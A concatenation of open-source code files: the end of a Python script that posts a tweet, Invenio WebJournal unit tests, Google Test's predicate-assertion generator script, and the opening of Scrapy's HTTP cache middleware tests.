    except ConfigParser.Error:
      return None
  def _GetConfig(self):
    # Parse ~/.tweetrc on first use; ConfigParser.read() silently
    # ignores a missing file, so lookups then fail with NoSectionError.
    if not self._config:
      self._config = ConfigParser.ConfigParser()
      self._config.read(os.path.expanduser('~/.tweetrc'))
    return self._config
def main():
try:
shortflags = 'h'
longflags = ['help', 'consumer-key=', 'consumer-secret=',
'access-key=', 'access-secret=', 'encoding=']
opts, args = getopt.gnu_getopt(sys.argv[1:], shortflags, longflags)
except getopt.GetoptError:
PrintUsageAndExit()
consumer_keyflag = None
consumer_secretflag = None
access_keyflag = None
access_secretflag = None
encoding = None
for o, a in opts:
if o in ("-h", "--help"):
PrintUsageAndExit()
if o in ("--consumer-key"):
consumer_keyflag = a
if o in ("--consumer-secret"):
consumer_secretflag = a
if o in ("--access-key"):
access_keyflag = a
if o in ("--access-secret"):
access_secretflag = a
if o in ("--encoding"):
encoding = a
message = ' '.join(args)
if not message:
PrintUsageAndExit()
rc = TweetRc()
consumer_key = consumer_keyflag or GetConsumerKeyEnv() or rc.GetConsumerKey()
consumer_secret = consumer_secretflag or GetConsumerSecretEnv() or rc.GetConsumerSecret()
access_key = access_keyflag or GetAccessKeyEnv() or rc.GetAccessKey()
access_secret = access_secretflag or GetAccessSecretEnv() or rc.GetAccessSecret()
if not consumer_key or not consumer_secret or not access_key or not access_secret:
PrintUsageAndExit()
api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,
access_token_key=access_key, access_token_secret=access_secret,
input_encoding=encoding)
try:
status = api.PostUpdate(message)
except UnicodeDecodeError:
print "Your message could not be encoded. Perhaps it contains non-ASCII characters? "
print "Try explicitly specifying the encoding with the --encoding flag"
sys.exit(2)
print "%s just posted: %s" % (status.user.name, status.text)
# Standard script entry point: only post when run directly, not on import.
if __name__ == "__main__":
  main()
| apache-2.0 |
AlbertoPeon/invenio | modules/webjournal/lib/webjournal_unit_tests.py | 16 | 2773 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Unit tests for WebJournal."""
__revision__ = \
"$Id$"
# pylint invenio/modules/webjournal/lib/webjournal_tests.py
import unittest
from invenio.webjournal_utils import compare_issues
from invenio.webjournal import issue_is_later_than
#from invenio import webjournal_utils
from invenio.testutils import make_test_suite, run_test_suite
#from invenio.config import CFG_SITE_URL
class TestCompareIssues(unittest.TestCase):
    """Tests for comparing issues."""
    def test_compare_issues(self):
        """webjournal - tests comparing issues"""
        # (issue1, issue2, expected sign of comparison)
        cases = (('06/2009', '07/2009', -1),
                 ('07/2009', '06/2009', 1),
                 ('07/2009', '07/2009', 0),
                 ('07/2009', '07/2008', 1),
                 ('07/2008', '07/2009', -1))
        for issue1, issue2, expected in cases:
            self.assertEqual(compare_issues(issue1, issue2), expected)
    def test_issue1_is_later_than(self):
        """webjournal - tests comparing issue1 is later than issue2 """
        # (issue1, issue2, whether issue1 is strictly later)
        cases = (('07/2009', '07/2008', True),
                 ('07/2008', '07/2009', False),
                 ('07/2009', '06/2009', True),
                 ('06/2009', '07/2009', False),
                 ('07/2009', '07/2009', False))
        for issue1, issue2, expected in cases:
            self.assertEqual(issue_is_later_than(issue1, issue2), expected)
# Collect the test cases above into the suite Invenio's test runner expects.
TEST_SUITE = make_test_suite(TestCompareIssues)
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    run_test_suite(TEST_SUITE)
| gpl-2.0 |
AgileInstitute/SetDemo-GTest | SetDemo/gtest-1.7.0/scripts/gen_gtest_pred_impl.py | 2538 | 21986 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""gen_gtest_pred_impl.py v0.1
Generates the implementation of Google Test predicate assertions and
accompanying tests.
Usage:
gen_gtest_pred_impl.py MAX_ARITY
where MAX_ARITY is a positive integer.
The command generates the implementation of up-to MAX_ARITY-ary
predicate assertions, and writes it to file gtest_pred_impl.h in the
directory where the script is. It also generates the accompanying
unit test in file gtest_pred_impl_unittest.cc.
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import sys
import time
# Directory containing this script; output paths below are resolved
# relative to it so the generator can be invoked from anywhere.
SCRIPT_DIR = os.path.dirname(sys.argv[0])
# Where to store the generated header.
HEADER = os.path.join(SCRIPT_DIR, '../include/gtest/gtest_pred_impl.h')
# Where to store the generated unit test.
UNIT_TEST = os.path.join(SCRIPT_DIR, '../test/gtest_pred_impl_unittest.cc')
def HeaderPreamble(n):
  """Returns the preamble for the header file.

  Args:
    n: the maximum arity of the predicate macros to be generated.
  """
  # Values interpolated into the %-template below.
  defs = dict(today=time.strftime('%m/%d/%Y'),
              year=time.strftime('%Y'),
              command='%s %s' % (os.path.basename(sys.argv[0]), n),
              n=n)
  template = """// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
//
// Implements a family of generic predicate assertion macros.
#ifndef GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
#define GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
// Makes sure this header is not included before gtest.h.
#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
# error Do not include gtest_pred_impl.h directly. Include gtest.h instead.
#endif // GTEST_INCLUDE_GTEST_GTEST_H_
// This header implements a family of generic predicate assertion
// macros:
//
// ASSERT_PRED_FORMAT1(pred_format, v1)
// ASSERT_PRED_FORMAT2(pred_format, v1, v2)
// ...
//
// where pred_format is a function or functor that takes n (in the
// case of ASSERT_PRED_FORMATn) values and their source expression
// text, and returns a testing::AssertionResult. See the definition
// of ASSERT_EQ in gtest.h for an example.
//
// If you don't care about formatting, you can use the more
// restrictive version:
//
// ASSERT_PRED1(pred, v1)
// ASSERT_PRED2(pred, v1, v2)
// ...
//
// where pred is an n-ary function or functor that returns bool,
// and the values v1, v2, ..., must support the << operator for
// streaming to std::ostream.
//
// We also define the EXPECT_* variations.
//
// For now we only support predicates whose arity is at most %(n)s.
// Please email googletestframework@googlegroups.com if you need
// support for higher arities.
// GTEST_ASSERT_ is the basic statement to which all of the assertions
// in this file reduce. Don't use this in your code.
#define GTEST_ASSERT_(expression, on_failure) \\
GTEST_AMBIGUOUS_ELSE_BLOCKER_ \\
if (const ::testing::AssertionResult gtest_ar = (expression)) \\
; \\
else \\
on_failure(gtest_ar.failure_message())
"""
  return template % defs
def Arity(n):
  """Returns the English name of the given arity (None for negative n)."""
  if n < 0:
    return None
  names = ('nullary', 'unary', 'binary', 'ternary')
  if n < len(names):
    return names[n]
  return '%s-ary' % n
def Title(word):
  """Returns the given word in title case.  The difference between
  this and string's title() method is that Title('4-ary') is '4-ary'
  while '4-ary'.title() is '4-Ary'."""
  first, rest = word[0], word[1:]
  return first.upper() + rest
def OneTo(n):
  """Returns the list [1, 2, 3, ..., n].

  Yields an empty sequence when n < 1.
  """
  return range(1, n + 1)
def Iter(n, format, sep=''):
  """Given a positive integer n, a format string that contains 0 or
  more '%s' format specs, and optionally a separator string, returns
  the join of n strings, each formatted with the format string on an
  iterator ranged from 1 to n.

  Example:

  Iter(3, 'v%s', sep=', ') returns 'v1, v2, v3'.
  """
  # Number of '%s' specs in format (same count as splitting on '%s').
  spec_count = format.count('%s')
  pieces = [format % ((i,) * spec_count) for i in OneTo(n)]
  return sep.join(pieces)
def ImplementationForArity(n):
  """Returns the implementation of n-ary predicate assertions.

  Builds, as one big string, the C++ helper function AssertPredNHelper plus
  the GTEST_PRED*_ / {EXPECT,ASSERT}_PRED* macros for arity n.
  """

  # A map that defines the values used in the implementation template.
  DEFS = {
    'n' : str(n),
    'vs' : Iter(n, 'v%s', sep=', '),
    'vts' : Iter(n, '#v%s', sep=', '),
    'arity' : Arity(n),
    'Arity' : Title(Arity(n))
  }

  # Helper function signature: one template type parameter per value.
  impl = """
// Helper function for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
template <typename Pred""" % DEFS

  impl += Iter(n, """,
typename T%s""")

  impl += """>
AssertionResult AssertPred%(n)sHelper(const char* pred_text""" % DEFS

  impl += Iter(n, """,
const char* e%s""")

  impl += """,
Pred pred"""

  impl += Iter(n, """,
const T%s& v%s""")

  # Helper body: success short-circuits; failure streams every argument's
  # source text and runtime value into the message.
  impl += """) {
if (pred(%(vs)s)) return AssertionSuccess();
""" % DEFS

  impl += ' return AssertionFailure() << pred_text << "("'

  impl += Iter(n, """
<< e%s""", sep=' << ", "')

  impl += ' << ") evaluates to false, where"'

  impl += Iter(n, """
<< "\\n" << e%s << " evaluates to " << v%s""")

  # Internal macros delegating to GTEST_ASSERT_, then the public macros.
  impl += """;
}
// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
// Don't use this in your code.
#define GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, on_failure)\\
GTEST_ASSERT_(pred_format(%(vts)s, %(vs)s), \\
on_failure)
// Internal macro for implementing {EXPECT|ASSERT}_PRED%(n)s. Don't use
// this in your code.
#define GTEST_PRED%(n)s_(pred, %(vs)s, on_failure)\\
GTEST_ASSERT_(::testing::AssertPred%(n)sHelper(#pred""" % DEFS

  impl += Iter(n, """, \\
#v%s""")

  impl += """, \\
pred"""

  impl += Iter(n, """, \\
v%s""")

  impl += """), on_failure)
// %(Arity)s predicate assertion macros.
#define EXPECT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define EXPECT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_NONFATAL_FAILURE_)
#define ASSERT_PRED_FORMAT%(n)s(pred_format, %(vs)s) \\
GTEST_PRED_FORMAT%(n)s_(pred_format, %(vs)s, GTEST_FATAL_FAILURE_)
#define ASSERT_PRED%(n)s(pred, %(vs)s) \\
GTEST_PRED%(n)s_(pred, %(vs)s, GTEST_FATAL_FAILURE_)
""" % DEFS

  return impl
def HeaderPostamble():
  """Returns the postamble for the header file (the include-guard close)."""

  return """
#endif // GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
"""
def GenerateFile(path, content):
  """Given a file path and a content string, overwrites it with the
  given content."""
  # NOTE: Python 2 script -- uses print statements, file() and 'print >>'.
  print 'Updating file %s . . .' % path

  # 'w+' truncates any existing file; the trailing comma suppresses an
  # extra newline after the content.
  f = file(path, 'w+')
  print >>f, content,
  f.close()

  print 'File %s has been updated.' % path
def GenerateHeader(n):
  """Given the maximum arity n, updates the header file that implements
  the predicate assertions.

  The header is preamble + one implementation section per arity 1..n +
  postamble, written to the HEADER path (a module-level constant).
  """
  GenerateFile(HEADER,
               HeaderPreamble(n)
               + ''.join([ImplementationForArity(i) for i in OneTo(n)])
               + HeaderPostamble())
def UnitTestPreamble():
  """Returns the preamble for the unit test file: license header, includes,
  and the user-defined Bool type used to exercise the assertions."""

  # A map that defines the values used in the preamble template.
  DEFS = {
    'today' : time.strftime('%m/%d/%Y'),
    'year' : time.strftime('%Y'),
    'command' : '%s %s' % (os.path.basename(sys.argv[0]), sys.argv[1]),
  }

  return (
      """// Copyright 2006, Google Inc.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are
// met:
//
// * Redistributions of source code must retain the above copyright
// notice, this list of conditions and the following disclaimer.
// * Redistributions in binary form must reproduce the above
// copyright notice, this list of conditions and the following disclaimer
// in the documentation and/or other materials provided with the
// distribution.
// * Neither the name of Google Inc. nor the names of its
// contributors may be used to endorse or promote products derived from
// this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
// This file is AUTOMATICALLY GENERATED on %(today)s by command
// '%(command)s'. DO NOT EDIT BY HAND!
// Regression test for gtest_pred_impl.h
//
// This file is generated by a script and quite long. If you intend to
// learn how Google Test works by reading its unit tests, read
// gtest_unittest.cc instead.
//
// This is intended as a regression test for the Google Test predicate
// assertions. We compile it as part of the gtest_unittest target
// only to keep the implementation tidy and compact, as it is quite
// involved to set up the stage for testing Google Test using Google
// Test itself.
//
// Currently, gtest_unittest takes ~11 seconds to run in the testing
// daemon. In the future, if it grows too large and needs much more
// time to finish, we should consider separating this file into a
// stand-alone regression test.
#include <iostream>
#include "gtest/gtest.h"
#include "gtest/gtest-spi.h"
// A user-defined data type.
struct Bool {
explicit Bool(int val) : value(val != 0) {}
bool operator>(int n) const { return value > Bool(n).value; }
Bool operator+(const Bool& rhs) const { return Bool(value + rhs.value); }
bool operator==(const Bool& rhs) const { return value == rhs.value; }
bool value;
};
// Enables Bool to be used in assertions.
std::ostream& operator<<(std::ostream& os, const Bool& x) {
return os << (x.value ? "true" : "false");
}
""" % DEFS)
def TestsForArity(n):
  """Returns the tests for n-ary predicate assertions.

  Emits, as one string: sample predicate functions/functors and
  predicate-formatters of arity n, a shared test fixture that verifies
  each argument is evaluated exactly once, and one TEST_F per combination
  of {PRED vs PRED_FORMAT} x {EXPECT vs ASSERT} x {success vs failure}
  x {function vs functor} x {built-in vs user type}.
  """

  # A map that defines the values used in the template for the tests.
  DEFS = {
    'n' : n,
    'es' : Iter(n, 'e%s', sep=', '),
    'vs' : Iter(n, 'v%s', sep=', '),
    'vts' : Iter(n, '#v%s', sep=', '),
    'tvs' : Iter(n, 'T%s v%s', sep=', '),
    'int_vs' : Iter(n, 'int v%s', sep=', '),
    'Bool_vs' : Iter(n, 'Bool v%s', sep=', '),
    'types' : Iter(n, 'typename T%s', sep=', '),
    'v_sum' : Iter(n, 'v%s', sep=' + '),
    'arity' : Arity(n),
    'Arity' : Title(Arity(n)),
  }

  # Sample n-ary predicate: true iff the sum of its arguments is positive.
  tests = (
      """// Sample functions/functors for testing %(arity)s predicate assertions.
// A %(arity)s predicate function.
template <%(types)s>
bool PredFunction%(n)s(%(tvs)s) {
return %(v_sum)s > 0;
}
// The following two functions are needed to circumvent a bug in
// gcc 2.95.3, which sometimes has problem with the above template
// function.
bool PredFunction%(n)sInt(%(int_vs)s) {
return %(v_sum)s > 0;
}
bool PredFunction%(n)sBool(%(Bool_vs)s) {
return %(v_sum)s > 0;
}
""" % DEFS)

  # Functor flavor of the same predicate.
  tests += """
// A %(arity)s predicate functor.
struct PredFunctor%(n)s {
template <%(types)s>
bool operator()(""" % DEFS

  tests += Iter(n, 'const T%s& v%s', sep=""",
""")

  tests += """) {
return %(v_sum)s > 0;
}
};
""" % DEFS

  # Predicate-formatter function: returns an AssertionResult with a
  # custom failure message built from the argument source texts.
  tests += """
// A %(arity)s predicate-formatter function.
template <%(types)s>
testing::AssertionResult PredFormatFunction%(n)s(""" % DEFS

  tests += Iter(n, 'const char* e%s', sep=""",
""")

  tests += Iter(n, """,
const T%s& v%s""")

  tests += """) {
if (PredFunction%(n)s(%(vs)s))
return testing::AssertionSuccess();
return testing::AssertionFailure()
<< """ % DEFS

  tests += Iter(n, 'e%s', sep=' << " + " << ')

  tests += """
<< " is expected to be positive, but evaluates to "
<< %(v_sum)s << ".";
}
""" % DEFS

  # Functor flavor of the predicate-formatter; delegates to the function.
  tests += """
// A %(arity)s predicate-formatter functor.
struct PredFormatFunctor%(n)s {
template <%(types)s>
testing::AssertionResult operator()(""" % DEFS

  tests += Iter(n, 'const char* e%s', sep=""",
""")

  tests += Iter(n, """,
const T%s& v%s""")

  tests += """) const {
return PredFormatFunction%(n)s(%(es)s, %(vs)s);
}
};
""" % DEFS

  # Test fixture: counts how often each argument is evaluated (n1_..nn_)
  # and whether the test body ran to completion.
  tests += """
// Tests for {EXPECT|ASSERT}_PRED_FORMAT%(n)s.
class Predicate%(n)sTest : public testing::Test {
protected:
virtual void SetUp() {
expected_to_finish_ = true;
finished_ = false;""" % DEFS

  tests += """
""" + Iter(n, 'n%s_ = ') + """0;
}
"""

  tests += """
virtual void TearDown() {
// Verifies that each of the predicate's arguments was evaluated
// exactly once."""

  tests += ''.join(["""
EXPECT_EQ(1, n%s_) <<
"The predicate assertion didn't evaluate argument %s "
"exactly once.";""" % (i, i + 1) for i in OneTo(n)])

  tests += """
// Verifies that the control flow in the test function is expected.
if (expected_to_finish_ && !finished_) {
FAIL() << "The predicate assertion unexpactedly aborted the test.";
} else if (!expected_to_finish_ && finished_) {
FAIL() << "The failed predicate assertion didn't abort the test "
"as expected.";
}
}
// true iff the test function is expected to run to finish.
static bool expected_to_finish_;
// true iff the test function did run to finish.
static bool finished_;
""" % DEFS

  tests += Iter(n, """
static int n%s_;""")

  tests += """
};
bool Predicate%(n)sTest::expected_to_finish_;
bool Predicate%(n)sTest::finished_;
""" % DEFS

  # %%(n)s survives the inner Iter() substitution and is filled by % DEFS.
  tests += Iter(n, """int Predicate%%(n)sTest::n%s_;
""") % DEFS

  tests += """
typedef Predicate%(n)sTest EXPECT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED_FORMAT%(n)sTest;
typedef Predicate%(n)sTest EXPECT_PRED%(n)sTest;
typedef Predicate%(n)sTest ASSERT_PRED%(n)sTest;
""" % DEFS

  def GenTest(use_format, use_assert, expect_failure,
              use_functor, use_user_type):
    """Returns the test for a predicate assertion macro.

    Args:
    use_format: true iff the assertion is a *_PRED_FORMAT*.
    use_assert: true iff the assertion is a ASSERT_*.
    expect_failure: true iff the assertion is expected to fail.
    use_functor: true iff the first argument of the assertion is
    a functor (as opposed to a function)
    use_user_type: true iff the predicate functor/function takes
    argument(s) of a user-defined type.

    Example:

    GenTest(1, 0, 0, 1, 0) returns a test that tests the behavior
    of a successful EXPECT_PRED_FORMATn() that takes a functor
    whose arguments have built-in types."""

    if use_assert:
      assrt = 'ASSERT' # 'assert' is reserved, so we cannot use
      # that identifier here.
    else:
      assrt = 'EXPECT'

    assertion = assrt + '_PRED'

    if use_format:
      pred_format = 'PredFormat'
      assertion += '_FORMAT'
    else:
      pred_format = 'Pred'

    assertion += '%(n)s' % DEFS

    if use_functor:
      pred_format_type = 'functor'
      pred_format += 'Functor%(n)s()'
    else:
      pred_format_type = 'function'
      pred_format += 'Function%(n)s'
      if not use_format:
        if use_user_type:
          pred_format += 'Bool'
        else:
          pred_format += 'Int'

    test_name = pred_format_type.title()

    # Failing tests use post-increment so the counter still records exactly
    # one evaluation even though the predicate value is non-positive.
    if use_user_type:
      arg_type = 'user-defined type (Bool)'
      test_name += 'OnUserType'
      if expect_failure:
        arg = 'Bool(n%s_++)'
      else:
        arg = 'Bool(++n%s_)'
    else:
      arg_type = 'built-in type (int)'
      test_name += 'OnBuiltInType'
      if expect_failure:
        arg = 'n%s_++'
      else:
        arg = '++n%s_'

    if expect_failure:
      successful_or_failed = 'failed'
      expected_or_not = 'expected.'
      test_name += 'Failure'
    else:
      successful_or_failed = 'successful'
      expected_or_not = 'UNEXPECTED!'
      test_name += 'Success'

    # A map that defines the values used in the test template.
    defs = DEFS.copy()
    defs.update({
      'assert' : assrt,
      'assertion' : assertion,
      'test_name' : test_name,
      'pf_type' : pred_format_type,
      'pf' : pred_format,
      'arg_type' : arg_type,
      'arg' : arg,
      'successful' : successful_or_failed,
      'expected' : expected_or_not,
    })

    test = """
// Tests a %(successful)s %(assertion)s where the
// predicate-formatter is a %(pf_type)s on a %(arg_type)s.
TEST_F(%(assertion)sTest, %(test_name)s) {""" % defs

    indent = (len(assertion) + 3)*' '
    extra_indent = ''

    # Expected failures are wrapped in EXPECT_{NON,}FATAL_FAILURE blocks.
    if expect_failure:
      extra_indent = ' '
      if use_assert:
        test += """
expected_to_finish_ = false;
EXPECT_FATAL_FAILURE({ // NOLINT"""
      else:
        test += """
EXPECT_NONFATAL_FAILURE({ // NOLINT"""
    test += '\n' + extra_indent + """ %(assertion)s(%(pf)s""" % defs

    test = test % defs
    test += Iter(n, ',\n' + indent + extra_indent + '%(arg)s' % defs)
    test += ');\n' + extra_indent + ' finished_ = true;\n'

    if expect_failure:
      test += ' }, "");\n'

    test += '}\n'
    return test

  # Generates tests for all 2**6 = 64 combinations.
  tests += ''.join([GenTest(use_format, use_assert, expect_failure,
                            use_functor, use_user_type)
                    for use_format in [0, 1]
                    for use_assert in [0, 1]
                    for expect_failure in [0, 1]
                    for use_functor in [0, 1]
                    for use_user_type in [0, 1]
                    ])

  return tests
def UnitTestPostamble():
  """Returns the postamble appended after the generated tests."""
  # The generated unit-test file needs no closing boilerplate.
  return ""
def GenerateUnitTest(n):
  """Returns the tests for up-to n-ary predicate assertions.

  Writes preamble + one test section per arity 1..n + postamble to the
  UNIT_TEST path (a module-level constant).
  """
  GenerateFile(UNIT_TEST,
               UnitTestPreamble()
               + ''.join([TestsForArity(i) for i in OneTo(n)])
               + UnitTestPostamble())
def _Main():
  """The entry point of the script. Generates the header file and its
  unit test."""
  # Requires exactly one argument: the maximum predicate arity to support.
  if len(sys.argv) != 2:
    print __doc__
    print 'Author: ' + __author__
    sys.exit(1)

  n = int(sys.argv[1])
  GenerateHeader(n)
  GenerateUnitTest(n)
# Script entry point: expects the maximum arity as the sole argument.
if __name__ == '__main__':
  _Main()
| mit |
dhenyjarasandy/scrapy | tests/test_downloadermiddleware_httpcache.py | 5 | 19286 | from __future__ import print_function
import time
import tempfile
import shutil
import unittest
import email.utils
from contextlib import contextmanager
import pytest
from scrapy.http import Response, HtmlResponse, Request
from scrapy.spider import Spider
from scrapy.settings import Settings
from scrapy.exceptions import IgnoreRequest
from scrapy.utils.test import get_crawler
from scrapy.contrib.downloadermiddleware.httpcache import HttpCacheMiddleware
class _BaseTest(unittest.TestCase):
    """Shared fixture for HttpCacheMiddleware tests.

    Builds a fresh crawler/spider/temp cache dir per test and provides
    context managers that yield an opened middleware, storage or policy.
    """

    # Defaults under test; subclasses override to vary backend/policy.
    storage_class = 'scrapy.contrib.httpcache.DbmCacheStorage'
    policy_class = 'scrapy.contrib.httpcache.RFC2616Policy'

    def setUp(self):
        # Reference dates used for Expires/Last-Modified/Date headers.
        self.yesterday = email.utils.formatdate(time.time() - 86400)
        self.today = email.utils.formatdate()
        self.tomorrow = email.utils.formatdate(time.time() + 86400)
        self.crawler = get_crawler(Spider)
        self.spider = self.crawler._create_spider('example.com')
        self.tmpdir = tempfile.mkdtemp()
        self.request = Request('http://www.example.com',
                               headers={'User-Agent': 'test'})
        self.response = Response('http://www.example.com',
                                 headers={'Content-Type': 'text/html'},
                                 body='test body',
                                 status=202)
        self.crawler.stats.open_spider(self.spider)

    def tearDown(self):
        self.crawler.stats.close_spider(self.spider, '')
        shutil.rmtree(self.tmpdir)

    def _get_settings(self, **new_settings):
        """Base cache settings; keyword overrides are merged on top."""
        settings = {
            'HTTPCACHE_ENABLED': True,
            'HTTPCACHE_DIR': self.tmpdir,
            'HTTPCACHE_EXPIRATION_SECS': 1,
            'HTTPCACHE_IGNORE_HTTP_CODES': [],
            'HTTPCACHE_POLICY': self.policy_class,
            'HTTPCACHE_STORAGE': self.storage_class,
        }
        settings.update(new_settings)
        return Settings(settings)

    @contextmanager
    def _storage(self, **new_settings):
        # Yields only the storage backend of a freshly opened middleware.
        with self._middleware(**new_settings) as mw:
            yield mw.storage

    @contextmanager
    def _policy(self, **new_settings):
        # Yields only the cache policy of a freshly opened middleware.
        with self._middleware(**new_settings) as mw:
            yield mw.policy

    @contextmanager
    def _middleware(self, **new_settings):
        """Yields an opened HttpCacheMiddleware; always closes it on exit."""
        settings = self._get_settings(**new_settings)
        mw = HttpCacheMiddleware(settings, self.crawler.stats)
        mw.spider_opened(self.spider)
        try:
            yield mw
        finally:
            mw.spider_closed(self.spider)

    def assertEqualResponse(self, response1, response2):
        self.assertEqual(response1.url, response2.url)
        self.assertEqual(response1.status, response2.status)
        self.assertEqual(response1.headers, response2.headers)
        self.assertEqual(response1.body, response2.body)

    def assertEqualRequest(self, request1, request2):
        self.assertEqual(request1.url, request2.url)
        self.assertEqual(request1.headers, request2.headers)
        self.assertEqual(request1.body, request2.body)

    def assertEqualRequestButWithCacheValidators(self, request1, request2):
        # request2 must carry at least one conditional header added by the
        # cache policy; request1 must carry none.
        self.assertEqual(request1.url, request2.url)
        assert not 'If-None-Match' in request1.headers
        assert not 'If-Modified-Since' in request1.headers
        assert any(h in request2.headers for h in ('If-None-Match', 'If-Modified-Since'))
        self.assertEqual(request1.body, request2.body)

    def test_dont_cache(self):
        # meta['dont_cache'] = True must prevent storing the response.
        with self._middleware() as mw:
            self.request.meta['dont_cache'] = True
            mw.process_response(self.request, self.response, self.spider)
            self.assertEqual(mw.storage.retrieve_response(self.spider, self.request), None)

        with self._middleware() as mw:
            self.request.meta['dont_cache'] = False
            mw.process_response(self.request, self.response, self.spider)
            if mw.policy.should_cache_response(self.response, self.request):
                self.assertIsInstance(mw.storage.retrieve_response(self.spider, self.request), self.response.__class__)
class DefaultStorageTest(_BaseTest):
    """Store/retrieve/expiry behaviour of the configured storage backend."""

    def test_storage(self):
        with self._storage() as storage:
            request2 = self.request.copy()
            assert storage.retrieve_response(self.spider, request2) is None

            storage.store_response(self.spider, self.request, self.response)
            response2 = storage.retrieve_response(self.spider, request2)
            assert isinstance(response2, HtmlResponse)  # content-type header
            self.assertEqualResponse(self.response, response2)

            time.sleep(2)  # wait for cache to expire (EXPIRATION_SECS is 1)
            assert storage.retrieve_response(self.spider, request2) is None
